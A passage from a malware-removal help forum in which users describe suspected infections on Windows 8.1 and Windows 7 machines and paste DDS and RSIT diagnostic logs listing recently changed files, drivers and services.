2015-08-24 10:40:34 -------- d-----w- c:\programdata\Blizzard Entertainment
2015-08-24 10:40:34 -------- d-----w- c:\program files\Battle.net
2015-08-24 10:38:13 -------- d-----w- c:\programdata\Battle.net
2015-08-22 22:46:01 -------- d-----w- c:\program files\SigmaTel
2015-08-22 14:23:20 12872 ----a-w- c:\windows\system32\bootdelete.exe
2015-08-22 04:34:52 97560 ----a-w- c:\windows\system32\drivers\zam32.sys
2015-08-22 04:34:34 97560 ----a-w- c:\windows\system32\drivers\zamguard32.sys
2015-08-20 20:10:58 -------- d-----w- c:\programdata\HitmanPro
2015-08-16 21:06:40 -------- d-----w- c:\users\User\appdata\local\{6E9ECE0F-B878-4E61-8406-5EC4DB3D4962}
2015-08-16 20:04:48 -------- d-----w- c:\users\User\appdata\local\DriverToolkit
2015-08-15 14:05:59 -------- d-----w- c:\users\User\appdata\roaming\NeroDigital(TM)
2015-08-13 13:32:28 920088 ----a-w- c:\windows\system32\igxpun.exe
2015-08-13 12:37:49 39936 ----a-w- c:\windows\system32\drivers\rimmptsk.sys
2015-08-13 12:37:49 37376 ----a-w- c:\windows\system32\drivers\rixdptsk.sys
2015-08-13 12:37:49 16480 ----a-w- c:\windows\system32\rixdicon.dll
2015-08-13 12:37:48 42496 ----a-w- c:\windows\system32\drivers\rimsptsk.sys
2015-08-13 12:37:11 57344 ----a-w- c:\program files\common files\installshield\professional\runtime\0701\intel32\ctor.dll
2015-08-13 12:37:11 32768 ----a-w- c:\program files\common files\installshield\professional\runtime\Objectps.dll
2015-08-13 12:37:11 237568 ----a-w- c:\program files\common files\installshield\professional\runtime\0701\intel32\iscript.dll
2015-08-13 12:37:11 155648 ----a-w- c:\program files\common files\installshield\professional\runtime\0701\intel32\iuser.dll
2015-08-13 12:37:10 692224 ----a-w- c:\program files\common files\installshield\professional\runtime\0701\intel32\iKernel.dll
2015-08-13 12:37:10 5632 ----a-w- c:\program files\common files\installshield\professional\runtime\0701\intel32\DotNetInstaller.exe
2015-08-13 12:37:10 163972 ----a-w- c:\program files\common files\installshield\professional\runtime\0701\intel32\iGdi.dll
2015-08-13 12:37:09 282756 ----a-w- c:\program files\common files\installshield\professional\runtime\0701\intel32\setup.dll
2015-08-13 10:48:38 107608 ----a-w- c:\program files\common files\microsoft shared\office14\EXP_PDF.DLL
2015-08-13 04:01:05 56256 ----a-w- c:\windows\system32\drivers\mountmgr.sys
2015-08-13 04:01:05 49664 ----a-w- c:\windows\system32\csrsrv.dll
2015-08-13 04:01:05 140224 ----a-w- c:\windows\system32\drivers\ecache.sys
2015-08-13 04:01:05 1206192 ----a-w- c:\windows\system32\ntdll.dll
2015-08-13 04:01:05 10752 ----a-w- c:\windows\system32\msmmsp.dll
2015-08-13 04:01:04 564224 ----a-w- c:\windows\system32\emdmgmt.dll
2015-08-13 04:01:04 3605440 ----a-w- c:\windows\system32\ntkrnlpa.exe
2015-08-13 04:01:03 3553216 ----a-w- c:\windows\system32\ntoskrnl.exe
2015-08-13 03:59:53 103120 ----a-w- c:\windows\system32\PresentationCFFRasterizerNative_v0300.dll
2015-08-13 03:58:40 2067968 ----a-w- c:\windows\system32\mstscax.dll
2015-08-13 03:53:39 68608 ----a-w- c:\windows\system32\basesrv.dll
2015-08-13 03:42:39 682496 ----a-w- c:\windows\system32\d2d1.dll
2015-08-13 03:42:39 486400 ----a-w- c:\windows\system32\d3d10level9.dll
2015-08-13 03:42:39 219648 ----a-w- c:\windows\system32\d3d10_1core.dll
2015-08-13 03:42:39 189952 ----a-w- c:\windows\system32\d3d10core.dll
2015-08-13 03:42:39 160768 ----a-w- c:\windows\system32\d3d10_1.dll
2015-08-13 03:42:39 1172480 ----a-w- c:\windows\system32\d3d10warp.dll
2015-08-13 03:42:39 1029120 ----a-w- c:\windows\system32\d3d10.dll
2015-08-13 03:42:38 802304 ----a-w- c:\windows\system32\FntCache.dll
2015-08-13 03:42:38 1072640 ----a-w- c:\windows\system32\DWrite.dll
2015-08-13 03:41:08 199680 ----a-w- c:\windows\system32\WebClnt.dll
2015-08-13 03:40:46 151040 ----a-w- c:\windows\system32\notepad.exe
2015-08-13 03:40:46 151040 ----a-w- c:\windows\notepad.exe
2015-08-13 03:38:25 -------- d-----w- C:\DRIVERS
2015-08-13 03:25:39 53248 ----a-w- c:\windows\system32\RBK8F43.tmp
.
==================== Find3M ====================
.
2015-09-10 14:06:17 98520 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2015-08-31 22:48:00 499712 ----a-w- c:\windows\system32\msvcp71.dll
2015-08-31 22:48:00 348160 ----a-w- c:\windows\system32\msvcr71.dll
2015-08-17 17:18:19 1814016 ----a-w- c:\windows\system32\jscript9.dll
2015-08-17 17:14:56 367616 ----a-w- c:\windows\system32\html.iec
2015-08-17 17:12:06 1129472 ----a-w- c:\windows\system32\wininet.dll
2015-08-17 17:11:04 422400 ----a-w- c:\windows\system32\vbscript.dll
2015-08-17 17:11:02 1427968 ----a-w- c:\windows\system32\inetcpl.cpl
2015-08-17 17:10:36 142848 ----a-w- c:\windows\system32\ieUnatt.exe
2015-08-17 17:10:08 11776 ----a-w- c:\windows\system32\mshta.exe
2015-08-17 17:09:58 2382848 ----a-w- c:\windows\system32\mshtml.tlb
2015-08-14 05:22:27 1656 ----a-w- c:\windows\system32\ASOROSet.bin
2015-08-12 12:04:36 70168 ----a-w- c:\windows\system32\drivers\RapportHades.sys
2015-08-12 12:04:36 223000 ----a-w- c:\windows\system32\drivers\RapportKELL.sys
2015-08-11 22:33:16 778440 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2015-08-11 22:33:15 142536 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2015-08-04 23:03:08 877152 ----a-w- c:\windows\system32\msvcr120_clr0400.dll
2015-08-04 23:03:08 538208 ----a-w- c:\windows\system32\msvcp120_clr0400.dll
2015-07-28 10:02:10 250288 ----a-w- c:\windows\system32\drivers\avgidsdriverx.sys
2015-07-28 05:12:19 98520 ----a-w- c:\windows\system32\drivers\20F74CA3.sys
2015-07-23 15:44:26 31664 ----a-w- c:\windows\system32\drivers\avgidsshimx.sys
2015-07-13 06:14:14 202704 ----a-w- c:\windows\system32\drivers\eamonm.sys
2015-07-13 06:14:14 199608 ----a-w- c:\windows\system32\drivers\edevmon.sys
2015-07-13 06:14:14 144536 ----a-w- c:\windows\system32\drivers\ehdrv.sys
2015-07-13 06:14:14 132152 ----a-w- c:\windows\system32\drivers\epfwwfpr.sys
2015-07-03 16:04:03 1316864 ----a-w- c:\windows\system32\ole32.dll
2015-06-27 16:03:22 783872 ----a-w- c:\windows\system32\rpcrt4.dll
2015-06-27 16:02:55 218112 ----a-w- c:\windows\system32\msv1_0.dll
2015-06-27 16:02:34 501248 ----a-w- c:\windows\system32\kerberos.dll
2015-06-27 16:01:58 801280 ----a-w- c:\windows\system32\advapi32.dll
2015-06-27 14:21:13 217088 ----a-w- c:\windows\system32\drivers\mrxsmb10.sys
2015-06-27 14:21:10 81408 ----a-w- c:\windows\system32\drivers\mrxsmb20.sys
2015-06-24 00:29:00 1217192 ----a-w- c:\windows\system32\FM20.DLL
2015-06-23 12:27:10 246952 ------w- c:\windows\system32\MpSigStub.exe
2015-06-18 07:41:50 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2015-06-18 07:41:42 94936 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2015-06-18 07:41:36 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2015-06-17 16:50:20 2264576 ----a-w- c:\windows\system32\msi.dll
2015-06-17 15:09:17 73216 ----a-w- c:\windows\system32\msiexec.exe
2015-06-16 14:54:52 207328 ----a-w- c:\windows\system32\drivers\avgldx86.sys
.
============= FINISH: 17:40:06.23 ===============

Attached Files
File Type: txt dss Attach.txt (8.8 KB)

Followed STICKY Steps, DDS Won't Run

Hi,
First, thanks for being willing to provide this kind of support.

I followed all your steps, but when I double-click DDS, I get a message that it is not meant to run in compatibility mode.

I do not have any Windows discs, and I do not have an optical drive on my computer.

You asked for details, so here's my novel! I've also attached the details of my problem in a TXT file, which I used to copy/paste here, but lines seem to disappear, duplicate, or overwrite when I scroll through this box.

The things most worrisome to me: McAfee continues to do erratic things, the mysterious timestamp file in C:/USERS/MARLENE, the huge system files with the same timestamp, the skipped drive letter, and the remote support software is denied access to my computer.

So many things have gone wrong in the past week, it's hard to know where to start, but since McAfee is still doing erratic things, I'll start there.


I have a Dell Inspiron 15 5547 laptop, Windows 8.1, but I run on the Desktop about 99% of the time. I bought it Jan 2015, it came with McAfee installed and I am now VERY SORRY to say I never did anything about that to install better security software.

First possible problem: Thurs 9/3 McAfee update download hung at 75%. I waited awhile, cancelled and restarted it, hung at 0%. I bought Dell Concierge 3-year support service with the computer so I called them. They took remote control, uninstalled and reinstalled McAfee and the new downloads and updates worked.

Sat-Mon 9/5-7 (Labor Day weekend) we were having technical problems with cable service in my area. Service was up and down a lot so I wasn't on my computer much, but I am connected via WiFi, so just because I wasn't on my computer doesn't mean it wasn't connected some of the time. When I started working Tuesday 9/8, I had 80+ new emails. I use Microsoft Outlook 2007 email, desktop POP3 client, so my email is downloaded to my hard drive. The Send/Receive seemed to hang on the 4th email, but a friend sometimes sends large video files so I just went online to do something else.

Internet Explorer started up with a very legitimate looking red McAfee Web Advisor banner that my firewall was not up and gave an option to start it or proceed without it. There was no way around this without making a choice, so I closed (X) Internet Explorer.

Then I got a very legitimate looking Windows Security popup on my desktop that indicated I had no firewall running and to choose to start either the Windows firewall or the McAfee firewall. I closed the dialog box without choosing. I decided to call Dell to determine if they did something wrong when they reinstalled McAfee. Meanwhile, I checked and my email was still hung, so I closed MS Office Outlook.

Dell wanted me to try connecting with Google Chrome, but I don't have it installed. I do have Mozilla Firefox but it came up with the same red McAfee Web Advisor banner. They had me do a shutdown with the power button. When I started back up I was able to start IE. (And my email downloaded ok.) However, when they tried to install their remote control software, it failed with an "access denied" error. We cleaned out temp files, reset IE, and got the same error. At that point they said all they could do was give me instructions to reset to factory setup and reinstall all my software. I said no, thank you, until I did some backups and attempted to determine if it was malware that could be removed.

All of this occurred between 11:45AM and 12:15PM Tuesday 9/8/15. Of course this is all happening in the middle of a project deadline, so I got my backup done and have been working offline as much as possible, just connecting once a day for 15-20 minutes to get my email and print anything I need, and keeping fingers crossed my computer doesn't completely crash.

Some odd things happened when I did my backup:
When I connected the external drive (USB) it connected as drive E instead of D. I disconnected it and put in a thumb drive, same thing, drive E. I don't know what's going on there.

I use NovaBackup to an external drive and typically backup C:/Users/Marlene. When I selected that folder for backup, at the top of Users/Marlene there was a folder I had never seen before named .oracle_je_usage and it had a Timestamp file in it dated 9/8/2015 11:55am. Since it was at the time I was having all the problems, I thought it was very suspicious, so (before reading your instructions) I copied it to an old thumb drive, deleted it and deleted it from the recycle bin. Then I did my data backup. Today the folder is back with a Timestamp file of 9/9 2:21pm.

Then, just because ... I don't necessarily know why, I decided to do a full C drive backup. I noticed 3 system files on C:\ with that 9/8 11:55am timestamp: hiberfil.sys 6.6GB, pagefile.sys 1.3GB, swapfile.sys 2.6MB.
Today, those files still have the 9/8 11:55am timestamp.

Now here I am on Saturday, ready to get this submitted to you. I wanted to do a quick backup of my changed documents and mail to a thumb drive and put in a couple to try to find one with space. I put in one I have used many times before. It "dinged" and a popup said it was installing "Ultra". I don't have a CLUE what that is about! "Ultra" does not show up on Control Panel as a program I can Uninstall. I opened a brand new thumb drive, did my current file backup, followed your instructions, and here I am.

Bottom line, I do not know if I was running without a firewall for days or not.

Since DDS won't run, what do I do now?

Attached Files
File Type: txt sept 8 problem.txt (4.7 KB)

PUPs and viruses problem

Hi there,

I would be grateful for some help with this problem. My partner tried to download Firefox from what turned out to be a dodgy site and this computer got infected. After running McAfee and Malwarebytes on it, he kept finding new viruses and PUPs.

We don't have a Windows install disk as the computer came with Windows 7 already installed. I ran RSIT on it as DDS found problems with a script blocker and I couldn't figure out how to stop it.

Thanks for all your help.

Fabiana



Logfile of random's system information tool 1.10 (written by random/random)
Run by Leslie at 2015-09-13 19:04:48
Microsoft Windows 7 Professional Service Pack 1
System drive C: has 31 GB (13%) free of 232 GB
Total RAM: 24574 MB (85% free)
2015-07-16 13:55:25 ----A---- C:\Windows\SysWOW64\x3daudio1_0.dll
2015-07-16 13:55:22 ----A---- C:\Windows\SysWOW64\d3dx9_30.dll
2015-07-15 19:49:55 ----D---- C:\Users\Leslie\AppData\Roaming\OpenOffice
2015-07-15 18:49:35 ----A---- C:\Windows\SysWOW64\cewmdm.dll
2015-07-15 18:48:15 ----A---- C:\Windows\SysWOW64\InkEd.dll
2015-07-15 18:47:54 ----A---- C:\Windows\SysWOW64\gdi32.dll
2015-07-15 18:13:04 ----D---- C:\Program Files (x86)\MSXML 4.0
2015-07-15 17:39:31 ----A---- C:\Windows\SysWOW64\comctl32.dll
2015-07-15 17:39:28 ----A---- C:\Windows\SysWOW64\ole32.dll
2015-07-15 17:39:22 ----A---- C:\Windows\SysWOW64\wintrust.dll
2015-07-15 17:39:22 ----A---- C:\Windows\SysWOW64\cryptsvc.dll
2015-07-15 17:39:22 ----A---- C:\Windows\SysWOW64\crypt32.dll
2015-07-15 17:39:21 ----A---- C:\Windows\SysWOW64\cryptnet.dll
2015-07-15 17:39:18 ----A---- C:\Windows\SysWOW64\msimsg.dll
2015-07-15 17:39:18 ----A---- C:\Windows\SysWOW64\msihnd.dll
2015-07-15 17:39:18 ----A---- C:\Windows\SysWOW64\msiexec.exe
2015-07-15 17:39:18 ----A---- C:\Windows\SysWOW64\msi.dll
2015-07-15 17:39:18 ----A---- C:\Windows\SysWOW64\authui.dll
2015-07-15 17:38:51 ----A---- C:\Windows\SysWOW64\certcli.dll
2015-07-15 17:38:46 ----A---- C:\Windows\SysWOW64\wmp.dll
2015-07-15 17:38:45 ----A---- C:\Windows\SysWOW64\wmploc.DLL
2015-07-15 17:38:45 ----A---- C:\Windows\SysWOW64\spwmp.dll
2015-07-15 17:38:45 ----A---- C:\Windows\SysWOW64\dxmasf.dll
2015-07-15 17:38:39 ----A---- C:\Windows\SysWOW64\tracerpt.exe
2015-07-15 17:38:39 ----A---- C:\Windows\SysWOW64\advapi32.dll
2015-07-15 17:38:38 ----A---- C:\Windows\SysWOW64\tdh.dll
2015-07-15 17:38:38 ----A---- C:\Windows\SysWOW64\sechost.dll
2015-07-15 17:38:38 ----A---- C:\Windows\SysWOW64\logman.exe
2015-07-15 17:38:37 ----A---- C:\Windows\SysWOW64\typeperf.exe
2015-07-15 17:38:37 ----A---- C:\Windows\SysWOW64\relog.exe
2015-07-15 17:38:37 ----A---- C:\Windows\SysWOW64\diskperf.exe
2015-07-15 16:07:58 ----D---- C:\ProgramData\Samsung
2015-07-15 16:07:58 ----A---- C:\Autoconfig.ini
2015-07-15 13:43:38 ----D---- C:\ProgramData\Ralink
2015-07-15 13:40:40 ----D---- C:\Program Files (x86)\NETGEAR
2015-07-15 13:40:34 ----D---- C:\ProgramData\NETGEAR
2015-07-14 22:09:48 ----D---- C:\Windows\Downloaded Installations
2015-07-14 21:31:24 ----D---- C:\Microstation
2015-07-14 21:17:41 ----D---- C:\$Projects
2015-07-14 17:57:20 ----D---- C:\Users\Leslie\AppData\Roaming\Macromedia
2015-07-14 17:52:30 ----D---- C:\Program Files (x86)\Autodesk
2015-07-14 17:51:39 ----D---- C:\Program Files (x86)\Microsoft Office
2015-07-14 17:51:39 ----D---- C:\Program Files (x86)\AnswerWorks 4.0
2015-07-14 17:51:38 ----D---- C:\Program Files (x86)\Common Files\Designer
2015-07-14 17:51:20 ----D---- C:\Program Files (x86)\AutoCAD 2005
2015-07-14 17:46:26 ----D---- C:\AutoCAD
2015-07-14 17:04:02 ----D---- C:\Users\Leslie\AppData\Roaming\Navisworks 2015
2015-07-14 17:04:02 ----D---- C:\Users\Leslie\AppData\Roaming\Autodesk Navisworks Manage 2015
2015-07-14 17:04:02 ----D---- C:\ProgramData\Autodesk Navisworks Manage 2015
2015-07-14 17:02:48 ----D---- C:\ProgramData\FARO
2015-07-14 16:57:21 ----D---- C:\Program Files (x86)\Microsoft WSE
2015-07-14 16:56:28 ----A---- C:\Windows\SysWOW64\D3DX9_43.dll
2015-07-14 16:56:28 ----A---- C:\Windows\SysWOW64\d3dx10_43.dll
2015-07-14 16:46:54 ----D---- C:\Autodesk
2015-07-14 16:35:25 ----D---- C:\Drivers
2015-07-14 16:32:43 ----D---- C:\ProgramData\FLEXnet
2015-07-14 16:21:47 ----D---- C:\Program Files (x86)\Common Files\Autodesk Shared
2015-07-14 16:20:57 ----D---- C:\ProgramData\Package Cache
2015-07-14 16:18:58 ----D---- C:\Users\Leslie\AppData\Roaming\Autodesk
2015-07-14 16:18:58 ----D---- C:\ProgramData\Autodesk
2015-07-14 15:56:29 ----D---- C:\Users\Leslie\AppData\Roaming\Adobe
2015-07-14 15:56:00 ----D---- C:\Users\Leslie\AppData\Roaming\Identities
2015-07-14 15:55:57 ----SD---- C:\Users\Leslie\AppData\Roaming\Microsoft
2015-07-14 15:55:57 ----D---- C:\Users\Leslie\AppData\Roaming\Media Center Programs
======List of files/folders modified in the last 2 months======
2015-09-13 19:04:50 ----D---- C:\Windows\Temp
2015-09-13 19:04:48 ----RD---- C:\Program Files (x86)
2015-09-13 18:54:31 ----D---- C:\Windows\System32
2015-09-13 18:54:31 ----D---- C:\Windows\inf
2015-09-13 18:47:48 ----HD---- C:\ProgramData
2015-09-13 18:45:17 ----D---- C:\ProgramData\NVIDIA
2015-09-05 21:45:42 ----D---- C:\Windows\Microsoft.NET
2015-09-05 12:52:02 ----SHD---- C:\Windows\Installer
2015-09-05 12:51:52 ----D---- C:\ProgramData\Skype
2015-09-05 12:50:51 ----SHD---- C:\System Volume Information
2015-09-05 12:12:58 ----RSD---- C:\Windows\assembly
2015-08-30 06:54:25 ----D---- C:\Program Files (x86)\Common Files
2015-08-30 06:53:58 ----D---- C:\Windows\SysWOW64
2015-08-30 06:53:54 ----A---- C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2015-08-30 06:53:45 ----D---- C:\Program Files (x86)\Java
2015-08-30 06:53:07 ----RD---- C:\Program Files (x86)\Skype
2015-08-25 15:01:07 ----D---- C:\Windows
2015-08-25 11:10:21 ----RD---- C:\Program Files
2015-08-25 10:58:56 ----HD---- C:\$Windows.~BT
2015-08-25 10:48:08 ----D---- C:\Windows\Panther
2015-08-25 07:53:59 ----D---- C:\Windows\Tasks
2015-08-24 20:00:00 ----D---- C:\Windows\AppPatch
2015-08-24 19:56:41 ----RSD---- C:\Windows\Fonts
2015-08-24 14:17:00 ----D---- C:\Program Files (x86)\Microsoft.NET
2015-08-24 14:05:17 ----SHD---- C:\$Recycle.Bin
2015-08-24 14:02:29 ----A---- C:\Windows\SysWOW64\dnsapi.dll
2015-08-24 08:15:51 ----D---- C:\Windows\SysWOW64\drivers
2015-08-24 07:43:37 ----D---- C:\Windows\Downloaded Program Files
2015-08-19 08:30:09 ----D---- C:\Windows\winsxs
2015-08-14 08:13:34 ----D---- C:\Users
2015-08-13 19:21:42 ----D---- C:\Windows\rescache
2015-08-13 07:13:11 ----D---- C:\Windows\SysWOW64\en-US
2015-08-13 07:13:10 ----D---- C:\Program Files (x86)\Internet Explorer
2015-08-13 01:52:29 ----D---- C:\Program Files (x86)\Microsoft Silverlight
2015-08-12 19:41:19 ----A---- C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-08-02 00:50:37 ----D---- C:\Windows\Logs
2015-07-24 13:50:17 ----D---- C:\Windows\SoftwareDistribution
2015-07-23 08:17:45 ----D---- C:\Windows\LiveKernelReports
2015-07-19 02:10:09 ----D---- C:\Windows\Help
2015-07-19 02:09:38 ----D---- C:\ProgramData\NVIDIA Corporation
2015-07-16 09:53:00 ----D---- C:\Program Files (x86)\Windows Media Player
2015-07-16 09:03:00 ----SD---- C:\Windows\SysWOW64\GWX
2015-07-16 05:04:41 ----D---- C:\Windows\PolicyDefinitions
2015-07-15 19:01:24 ----D---- C:\Program Files (x86)\Common Files\Adobe
2015-07-15 13:40:41 ----HD---- C:\Program Files (x86)\InstallShield Installation Information
2015-07-15 10:54:29 ----SD---- C:\ProgramData\Microsoft
2015-07-14 18:45:33 ----D---- C:\Windows\Prefetch
2015-07-14 18:37:49 ----D---- C:\Windows\AppCompat
2015-07-14 17:51:39 ----D---- C:\Program Files (x86)\Common Files\microsoft shared
2015-07-14 15:53:15 ----D---- C:\Windows\debug
======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R0 mfehidk;McAfee Inc. mfehidk; C:\Windows\system32\drivers\mfehidk.sys []
R0 mfewfpk;McAfee Inc. mfewfpk; C:\Windows\system32\drivers\mfewfpk.sys []
R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys []
R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys []
R1 vwififlt;Virtual WiFi Filter Driver; C:\Windows\system32\DRIVERS\vwififlt.sys []
R2 McPvDrv;McPvDrv Driver; C:\Windows\system32\drivers\McPvDrv.sys []
R3 A6210;NETGEAR A6210 USB Wireless LAN Card Driver; C:\Windows\system32\DRIVERS\A6210.sys []
R3 ADIHdAudAddService;ADI UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\ADIHdAud.sys []
R3 cfwids;McAfee Inc. cfwids; C:\Windows\system32\drivers\cfwids.sys []
R3 MBAMProtector;MBAMProtector; \??\C:\Windows\system32\drivers\mbam.sys []
R3 mfeaack;McAfee Inc. mfeaack; C:\Windows\system32\drivers\mfeaack.sys []
R3 mfeavfk;McAfee Inc. mfeavfk; C:\Windows\system32\drivers\mfeavfk.sys []
R3 mfefirek;McAfee Inc. mfefirek; C:\Windows\system32\drivers\mfefirek.sys []
R3 mfencbdc;McAfee Inc. mfencbdc; C:\Windows\system32\DRIVERS\mfencbdc.sys []
R3 mfesapsn;McAfee Process Start Notification Service; \??\C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [2015-09-02 37960]
R4 RegFilter;RegFilter; \??\C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\regfilter.sys []
S3 athr;Wireless PCI Adapter Driver Service; C:\Windows\system32\DRIVERS\athrx.sys []
S3 dmvsc;dmvsc; C:\Windows\system32\drivers\dmvsc.sys []
S3 e1express;Intel(R) PRO/1000 PCI Express Network Connection Driver; C:\Windows\system32\DRIVERS\e1e6232e.sys []
S3 fssfltr;FssFltr; C:\Windows\system32\DRIVERS\fssfltr.sys []
S3 HipShieldK;McAfee Inc. HipShieldK; C:\Windows\system32\drivers\HipShieldK.sys []
S3 igfx;igfx; C:\Windows\system32\DRIVERS\igdkmd64.sys []
S3 MBAMWebAccessControl;MBAMWebAccessControl; \??\C:\Windows\system32\drivers\mwac.sys []
S3 mfencrk;McAfee Inc. mfencrk; C:\Windows\system32\DRIVERS\mfencrk.sys []
S3 netr28ux;RT2870 USB Extensible Wireless LAN Card Driver; C:\Windows\system32\DRIVERS\netr28ux.sys []
S3 netr28x;Ralink 802.11n Extensible Wireless Driver; C:\Windows\system32\DRIVERS\netr28x.sys []
S3 NVHDA;Service for NVIDIA High Definition Audio Driver; C:\Windows\system32\drivers\nvhda64v.sys []
S3 pciide;pciide; C:\Windows\system32\drivers\pciide.sys []
S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys []
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver; C:\Windows\System32\drivers\rdpvideominiport.sys []
S3 RtlWlanu;ADD-NWU275v2 Wireless LAN 802.11n USB 2.0 Network Adapter; C:\Windows\system32\DRIVERS\rtwlanu.sys []
S3 s3cap;s3cap; C:\Windows\system32\drivers\vms3cap.sys []
S3 storvsc;storvsc; C:\Windows\system32\drivers\storvsc.sys []
S3 terminpt;Microsoft Remote Desktop Input Driver; C:\Windows\system32\drivers\terminpt.sys []
S3 TsUsbFlt;TsUsbFlt; C:\Windows\system32\drivers\tsusbflt.sys []
S3 TsUsbGD;Remote Desktop Generic USB Device; C:\Windows\system32\drivers\TsUsbGD.sys []
S3 vmbus;vmbus; C:\Windows\system32\drivers\vmbus.sys []
S3 VMBusHID;VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys []
======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R2 AdAppMgrSvc;Autodesk Application Manager Service; C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe [2015-09-07 1136520]
R2 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2014-12-19 81088]
R2 Autodesk Content Service;Autodesk Content Service; C:\Program Files\Autodesk\Content Service\Connect.Service.ContentService.exe [2015-02-05 31160]
R2 c2cautoupdatesvc;Skype Click to Call Updater; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [2015-05-01 1394816]
R2 c2cpnrsvc;Skype Click to Call PNR Service; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [2015-05-01 1772672]
R2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2014-04-12 103608]
R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; C:\Windows\System32\svchost.exe [2009-07-14 20992]
R2 DiagTrack;@%SystemRoot%\system32\UtcResources.dll,-3001; C:\Windows\System32\svchost.exe [2009-07-14 20992]
R2 HitmanProScheduler;HitmanPro Scheduler; C:\Program Files\HitmanPro\hmpsched.exe [2015-08-30 127752]
R2 HomeNetSvc;McAfee Home Network; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2015-07-21 368048]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [2015-09-02 157928]
R2 McAPExe;McAfee AP Service; C:\Program Files\McAfee\MSC\McAPExe.exe [2015-08-21 782608]
R2 mccspsvc;McAfee CSP Service; C:\Program Files\Common Files\McAfee\CSP\1.6.1008.0\McCSPServiceHost.exe [2015-07-23 1694152]
R2 McMPFSvc;McAfee Personal Firewall Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2015-07-21 368048]
R2 McNaiAnn;McAfee VirusScan Announcer; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2015-07-21 368048]
R2 McNeelUpdate;McNeel Update Service 5.0; c:\Program Files (x86)\McNeelUpdate\5.0\McNeelUpdateService.exe [2015-08-10 67944]
R2 mcpltsvc;McAfee Platform Services; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2015-07-21 368048]
R2 McProxy;McAfee Proxy Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2015-07-21 368048]
R2 mfemms;McAfee Service Controller; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [2015-07-15 373704]
R2 msdotnetserv_v2050729;Microsoft .Net Framework v2.0.50729 ALP (X86); C:\Program Files (x86)\Microsoft.NET\v2.0.507279\msnetcore.exe [2015-07-05 3003880]
R2 MSK80Service;McAfee Anti-Spam Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2015-07-21 368048]
R2 NetgearSwitchUSB;NetgearSwitchUSB; C:\Program Files (x86)\NETGEAR\A6210\NetgearSwitchUSB.exe [2014-05-13 210648]
R2 NVIDIA Performance Driver Service;NVIDIA Performance Driver Service; C:\Program Files\NVIDIA Corporation\Performance Drivers\nvPDsvc.exe [2009-05-14 4901888]
R2 nvsvc;NVIDIA Display Driver Service; C:\Windows\system32\nvvsvc.exe []
R2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service; C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [2015-02-05 410952]
R2 wlidsvc;Windows Live ID Sign-in Assistant; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2012-07-17 2292480]
R3 McODS;McAfee Scanner; C:\Program Files\McAfee\VirusScan\mcods.exe [2015-07-17 639456]
R3 mfefire;McAfee Firewall Core Service; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [2015-06-29 232656]
R3 mfevtp;McAfee Validation Trust Protection Service; C:\Windows\system32\mfevtps.exe []
S2 0270371442166664mcinstcleanup;McAfee Application Installer Cleanup (0270371442166664); C:\Windows\TEMP\027037~1.EXE [2015-05-04 883024]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2014-04-11 124088]
S2 dbupdate;Dropbox Update Service (dbupdate); C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2015-07-23 134512]
S2 LiveUpdateSvc;LiveUpdate; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [2015-07-29 2909472]
S2 MBAMService;MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [2015-06-18 1133880]
S2 SkypeUpdate;Skype Updater; C:\Program Files (x86)\Skype\Updater\Updater.exe [2015-07-09 327296]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-08-12 269000]
S3 AppMgmt;@appmgmts.dll,-3250; C:\Windows\system32\svchost.exe [2009-07-14 20992]
